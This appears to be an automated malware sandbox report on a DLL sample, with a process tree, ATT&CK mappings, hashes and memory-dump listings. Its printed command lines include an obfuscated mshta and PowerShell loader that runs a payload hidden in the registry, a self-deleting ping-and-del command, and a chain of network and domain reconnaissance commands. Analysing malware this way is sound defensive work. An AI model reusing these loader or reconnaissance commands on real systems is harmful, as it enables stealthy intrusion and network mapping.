"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1028,7663750981683819211,6919894785628571082,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5000 /prefetch:8
3⤵
PID:3036

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1028,7663750981683819211,6919894785628571082,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
3⤵
PID:2488

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1028,7663750981683819211,6919894785628571082,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4868 /prefetch:8
3⤵
PID:2400

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1028,7663750981683819211,6919894785628571082,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3540 /prefetch:8
3⤵
PID:1664

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1028,7663750981683819211,6919894785628571082,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1864 /prefetch:8
3⤵
PID:1876

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1028,7663750981683819211,6919894785628571082,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4008 /prefetch:8
3⤵
PID:3060

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1028,7663750981683819211,6919894785628571082,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4312 /prefetch:8
3⤵
PID:2760

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
2⤵
PID:1384

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\f760495de9b1a0a152075541f40014ceb46925213da7e2c542bc6e606bea46fc (1)\" -spe -an -ai#7zMap20817:198:7zEvent28390
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2908

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\Downloads\f760495de9b1a0a152075541f40014ceb46925213da7e2c542bc6e606bea46fc (1)\f760495de9b1a0a152075541f40014ceb46925213da7e2c542bc6e606bea46fc.dll
2⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2244

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
2⤵
PID:2416

C:\Windows\system32\rundll32.exe
RUNDLL32.EXE "C:\Users\Admin\Downloads\f760495de9b1a0a152075541f40014ceb46925213da7e2c542bc6e606bea46fc (1)\f760495de9b1a0a152075541f40014ceb46925213da7e2c542bc6e606bea46fc.dll"
3⤵
PID:2172

C:\Windows\system32\rundll32.exe
RUNDLL32.EXE "C:\Users\Admin\Downloads\f760495de9b1a0a152075541f40014ceb46925213da7e2c542bc6e606bea46fc (1)\f760495de9b1a0a152075541f40014ceb46925213da7e2c542bc6e606bea46fc.dll"
3⤵
PID:2168

C:\Windows\system32\rundll32.exe
RUNDLL32.EXE "C:\Users\Admin\Downloads\f760495de9b1a0a152075541f40014ceb46925213da7e2c542bc6e606bea46fc (1)\f760495de9b1a0a152075541f40014ceb46925213da7e2c542bc6e606bea46fc.dll"
3⤵
PID:2596

C:\Windows\system32\rundll32.exe
RUNDLL32.EXE "C:\Users\Admin\Downloads\f760495de9b1a0a152075541f40014ceb46925213da7e2c542bc6e606bea46fc (1)\f760495de9b1a0a152075541f40014ceb46925213da7e2c542bc6e606bea46fc.dll"
3⤵
PID:2588

C:\Windows\system32\rundll32.exe
RUNDLL32.EXE "C:\Users\Admin\Downloads\f760495de9b1a0a152075541f40014ceb46925213da7e2c542bc6e606bea46fc (1)\f760495de9b1a0a152075541f40014ceb46925213da7e2c542bc6e606bea46fc.dll"
3⤵
PID:580

C:\Windows\system32\regsvr32.exe
regsvr32.exe "C:\Users\Admin\Downloads\f760495de9b1a0a152075541f40014ceb46925213da7e2c542bc6e606bea46fc (1)\f760495de9b1a0a152075541f40014ceb46925213da7e2c542bc6e606bea46fc.dll"
3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2732

C:\Windows\SysWOW64\regsvr32.exe
"C:\Users\Admin\Downloads\f760495de9b1a0a152075541f40014ceb46925213da7e2c542bc6e606bea46fc (1)\f760495de9b1a0a152075541f40014ceb46925213da7e2c542bc6e606bea46fc.dll"
4⤵
- Loads dropped DLL
PID:2656

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\Downloads\f760495de9b1a0a152075541f40014ceb46925213da7e2c542bc6e606bea46fc (1)\f760495de9b1a0a152075541f40014ceb46925213da7e2c542bc6e606bea46fc.dll
2⤵
- Modifies registry class
PID:2720

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\f760495de9b1a0a152075541f40014ceb46925213da7e2c542bc6e606bea46fc (1)\f760495de9b1a0a152075541f40014ceb46925213da7e2c542bc6e606bea46fc.dll
3⤵
PID:2848

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\Downloads\f760495de9b1a0a152075541f40014ceb46925213da7e2c542bc6e606bea46fc (1)\f760495de9b1a0a152075541f40014ceb46925213da7e2c542bc6e606bea46fc.dll
2⤵
PID:1872

C:\Windows\system32\verclsid.exe
"C:\Windows\system32\verclsid.exe" /S /C {0B2C9183-C9FA-4C53-AE21-C900B0C39965} /I {0C733A8A-2A1C-11CE-ADE5-00AA0044773D} /X 0x401
2⤵
PID:2440

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\regsvr32 (2).DMP
2⤵
- Modifies registry class
PID:2788

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\regsvr32 (2).DMP
3⤵
PID:1708

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Oxmh='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Oxmh).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\5DDA2DE9-1818-97BC-0AE1-CCBBDEA5C01F\\\StopSheet'));if(!window.flag)close()</script>"
2⤵
- Modifies Internet Explorer settings
PID:996

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name ddinybvv -value gp; new-alias -name afomuk -value iex; afomuk ([System.Text.Encoding]::ASCII.GetString((ddinybvv "HKCU:Software\AppDataLow\Software\Microsoft\5DDA2DE9-1818-97BC-0AE1-CCBBDEA5C01F").FolderCollect))
3⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:800

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nlew_9rm.cmdline"
4⤵
PID:388

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES14CB.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC14CA.tmp"
5⤵
PID:2176

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rjwca1em.cmdline"
4⤵
PID:2948

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES15E3.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC15E2.tmp"
5⤵
PID:2000

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\Downloads\f760495de9b1a0a152075541f40014ceb46925213da7e2c542bc6e606bea46fc (1)\f760495de9b1a0a152075541f40014ceb46925213da7e2c542bc6e606bea46fc.dll"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:2524

C:\Windows\system32\PING.EXE
ping localhost -n 5
3⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2220

C:\Windows\system32\cmd.exe
cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\D290.bi1"
2⤵
PID:1980

C:\Windows\system32\nslookup.exe
nslookup myip.opendns.com resolver1.opendns.com
3⤵
PID:3056

C:\Windows\system32\cmd.exe
cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\CF24.bi1"
2⤵
PID:1636

C:\Windows\system32\nslookup.exe
nslookup myip.opendns.com resolver1.opendns.com
3⤵
PID:1872

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\D290.bi1"
2⤵
PID:2740

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\CF24.bi1"
2⤵
PID:2504

C:\Windows\system32\cmd.exe
cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\2E60.bin1"
2⤵
PID:1892

C:\Windows\system32\systeminfo.exe
systeminfo.exe
3⤵
- Gathers system information
PID:2100

C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵
PID:428

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2E60.bin1"
2⤵
PID:2360

C:\Windows\system32\cmd.exe
cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\2E60.bin1"
2⤵
PID:2120

C:\Windows\system32\net.exe
net view
3⤵
- Discovers systems in the same network
PID:1720

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2E60.bin1"
2⤵
PID:388

C:\Windows\system32\cmd.exe
cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\2E60.bin1"
2⤵
PID:2948

C:\Windows\system32\nslookup.exe
nslookup 127.0.0.1
3⤵
PID:984

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2E60.bin1"
2⤵
PID:2532

C:\Windows\system32\cmd.exe
cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\2E60.bin1"
2⤵
PID:1688

C:\Windows\system32\tasklist.exe
tasklist.exe /SVC
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2840

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2E60.bin1"
2⤵
PID:2688

C:\Windows\system32\cmd.exe
cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\2E60.bin1"
2⤵
PID:292

C:\Windows\system32\driverquery.exe
driverquery.exe
3⤵
PID:1320

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2E60.bin1"
2⤵
PID:2340

C:\Windows\system32\cmd.exe
cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\2E60.bin1"
2⤵
PID:1064

C:\Windows\system32\reg.exe
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
3⤵
PID:2440

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2E60.bin1"
2⤵
PID:2944

C:\Windows\system32\cmd.exe
cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\2E60.bin1"
2⤵
PID:2116

C:\Windows\system32\net.exe
net config workstation
3⤵
PID:2308

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 config workstation
4⤵
PID:2448

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2E60.bin1"
2⤵
PID:2736

C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\2E60.bin1"
2⤵
PID:2700

C:\Windows\system32\nltest.exe
nltest /domain_trusts
3⤵
PID:3008

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2E60.bin1"
2⤵
PID:2976

C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\2E60.bin1"
2⤵
PID:2480

C:\Windows\system32\nltest.exe
nltest /domain_trusts /all_trusts
3⤵
PID:2632

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2E60.bin1"
2⤵
PID:1808

C:\Windows\system32\cmd.exe
cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\2E60.bin1"
2⤵
PID:2168

C:\Windows\system32\net.exe
net view /all /domain
3⤵
- Discovers systems in the same network
PID:2272

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2E60.bin1"
2⤵
PID:2800

C:\Windows\system32\cmd.exe
cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\2E60.bin1"
2⤵
PID:2348

C:\Windows\system32\net.exe
net view /all
3⤵
- Discovers systems in the same network
PID:188

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2E60.bin1"
2⤵
PID:2640

C:\Windows\system32\cmd.exe
cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\2E60.bin1 > C:\Users\Admin\AppData\Local\Temp\2E60.bin & del C:\Users\Admin\AppData\Local\Temp\2E60.bin1"
2⤵
PID:1376

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0xc4
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2748

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x540
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2928

C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe"
1⤵
- Drops file in Program Files directory
PID:2032

C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir2032_1750563338\ChromeRecovery.exe
"C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir2032_1750563338\ChromeRecovery.exe" --appguid={8A69D345-D564-463c-AFF1-A69D9E530F96} --browser-version=89.0.4389.114 --sessionid={0e2e9c97-5973-4842-8e4c-9d9f6e1c5ff4} --system
2⤵
- Executes dropped EXE
PID:2956

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

System Information Discovery

3

T1082

Remote System Discovery

2

T1018

Process Discovery

1

T1057

Query Registry

1

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\Downloads\f760495de9b1a0a152075541f40014ceb46925213da7e2c542bc6e606bea46fc (1).zip
Filesize
338KB

MD5
c6874052d8fe1a870e5598a663052ac2

SHA1
ff5f93eec504bc2804cefb64991d63806768802d

SHA256
66a57f8bc66aabf2efcbd1629f8a8c166e424a80ee78274ecb30f6c9d85bd2f0

SHA512
f8b9cada48391aa5a4422d048b0762f40b2f08e9a2eaa938894e239ef6fdc52f7ffbc5e50f69ebfd34cb19f9c56ee5da7d15a60e3b39b777b67e99ae4f6feb88

Download Submit
C:\Users\Admin\Downloads\f760495de9b1a0a152075541f40014ceb46925213da7e2c542bc6e606bea46fc (1)\f760495de9b1a0a152075541f40014ceb46925213da7e2c542bc6e606bea46fc.dll
Filesize
428KB

MD5
2ced3a825a7b8d9ad0153b2f8566b357

SHA1
4b6484602c29c298b5270f2c95e9aeeabb162737

SHA256
f760495de9b1a0a152075541f40014ceb46925213da7e2c542bc6e606bea46fc

SHA512
6e6d99f59cfa0f2f89f172e349a6fc3fc93482e5de1783ebe38bddac4338b7fe4139b82361caa9c0ed19613cce94b45f4768567a9b1b69faddd9055ed78b9730

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\pipe\crashpad_2024_QESLEIKUDKMPYLBY
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Users\Admin\Downloads\f760495de9b1a0a152075541f40014ceb46925213da7e2c542bc6e606bea46fc (1)\f760495de9b1a0a152075541f40014ceb46925213da7e2c542bc6e606bea46fc.dll
Filesize
428KB

MD5
2ced3a825a7b8d9ad0153b2f8566b357

SHA1
4b6484602c29c298b5270f2c95e9aeeabb162737

SHA256
f760495de9b1a0a152075541f40014ceb46925213da7e2c542bc6e606bea46fc

SHA512
6e6d99f59cfa0f2f89f172e349a6fc3fc93482e5de1783ebe38bddac4338b7fe4139b82361caa9c0ed19613cce94b45f4768567a9b1b69faddd9055ed78b9730

Download Submit
memory/188-145-0x0000000000000000-mapping.dmp

Download
memory/292-125-0x0000000000000000-mapping.dmp

Download
memory/388-97-0x0000000000000000-mapping.dmp

Download
memory/388-118-0x0000000000000000-mapping.dmp

Download
memory/428-113-0x0000000000000000-mapping.dmp

Download
memory/580-68-0x0000000000000000-mapping.dmp

Download
memory/800-101-0x000000001BA50000-0x000000001BA8F000-memory.dmp

Filesize
252KB

Download
memory/800-91-0x0000000000000000-mapping.dmp

Download
memory/800-96-0x000000000241B000-0x000000000243A000-memory.dmp

Filesize
124KB

Download
memory/800-95-0x0000000002414000-0x0000000002417000-memory.dmp

Filesize
12KB

Download
memory/800-94-0x000007FEE26B0000-0x000007FEE320D000-memory.dmp

Filesize
11.4MB

Download
memory/800-93-0x000007FEE3210000-0x000007FEE3C33000-memory.dmp

Filesize
10.1MB

Download
memory/984-120-0x0000000000000000-mapping.dmp

Download
memory/1064-128-0x0000000000000000-mapping.dmp

Download
memory/1320-126-0x0000000000000000-mapping.dmp

Download
memory/1376-147-0x0000000000000000-mapping.dmp

Download
memory/1628-54-0x000007FEFC151000-0x000007FEFC153000-memory.dmp

Filesize
8KB

Download
memory/1636-105-0x0000000000000000-mapping.dmp

Download
memory/1688-122-0x0000000000000000-mapping.dmp

Download
memory/1708-89-0x0000000000000000-mapping.dmp

Download
memory/1720-117-0x0000000000000000-mapping.dmp

Download
memory/1808-140-0x0000000000000000-mapping.dmp

Download
memory/1872-107-0x0000000000000000-mapping.dmp

Download
memory/1892-112-0x0000000000000000-mapping.dmp

Download
memory/1980-104-0x0000000000000000-mapping.dmp

Download
memory/2000-100-0x0000000000000000-mapping.dmp

Download
memory/2100-114-0x0000000000000000-mapping.dmp

Download
memory/2116-131-0x0000000000000000-mapping.dmp

Download
memory/2120-116-0x0000000000000000-mapping.dmp

Download
memory/2168-141-0x0000000000000000-mapping.dmp

Download
memory/2168-65-0x0000000000000000-mapping.dmp

Download
memory/2172-64-0x0000000000000000-mapping.dmp

Download
memory/2176-98-0x0000000000000000-mapping.dmp

Download
memory/2220-103-0x0000000000000000-mapping.dmp

Download
memory/2244-63-0x0000000003A70000-0x0000000003A80000-memory.dmp

Filesize
64KB

Download
memory/2272-142-0x0000000000000000-mapping.dmp

Download
memory/2308-132-0x0000000000000000-mapping.dmp

Download
memory/2340-127-0x0000000000000000-mapping.dmp

Download
memory/2348-144-0x0000000000000000-mapping.dmp

Download
memory/2360-115-0x0000000000000000-mapping.dmp

Download
memory/2440-129-0x0000000000000000-mapping.dmp

Download
memory/2448-133-0x0000000000000000-mapping.dmp

Download
memory/2480-138-0x0000000000000000-mapping.dmp

Download
memory/2504-109-0x0000000000000000-mapping.dmp

Download
memory/2524-102-0x0000000000000000-mapping.dmp

Download
memory/2532-121-0x0000000000000000-mapping.dmp

Download
memory/2588-67-0x0000000000000000-mapping.dmp

Download
memory/2596-66-0x0000000000000000-mapping.dmp

Download
memory/2632-139-0x0000000000000000-mapping.dmp

Download
memory/2640-146-0x0000000000000000-mapping.dmp

Download
memory/2656-82-0x00000000001B0000-0x00000000001BD000-memory.dmp

Filesize
52KB

Download
memory/2656-81-0x0000000000170000-0x0000000000176000-memory.dmp

Filesize
24KB

Download
memory/2656-79-0x00000000007F0000-0x000000000085D000-memory.dmp

Filesize
436KB

Download
memory/2656-76-0x0000000075611000-0x0000000075613000-memory.dmp

Filesize
8KB

Download
memory/2656-75-0x0000000000000000-mapping.dmp

Download
memory/2688-124-0x0000000000000000-mapping.dmp

Download
memory/2700-135-0x0000000000000000-mapping.dmp

Download
memory/2716-56-0x0000000000000000-mapping.dmp

Download
memory/2732-73-0x0000000000000000-mapping.dmp

Download
memory/2736-134-0x0000000000000000-mapping.dmp

Download
memory/2736-57-0x0000000000000000-mapping.dmp

Download
memory/2740-108-0x0000000000000000-mapping.dmp

Download
memory/2800-143-0x0000000000000000-mapping.dmp

Download
memory/2840-123-0x0000000000000000-mapping.dmp

Download
memory/2848-70-0x0000000000000000-mapping.dmp

Download
memory/2944-130-0x0000000000000000-mapping.dmp

Download
memory/2948-119-0x0000000000000000-mapping.dmp

Download
memory/2948-99-0x0000000000000000-mapping.dmp

Download
memory/2956-110-0x0000000000000000-mapping.dmp

Download
memory/2976-137-0x0000000000000000-mapping.dmp

Download
memory/3008-136-0x0000000000000000-mapping.dmp

Download
memory/3056-106-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads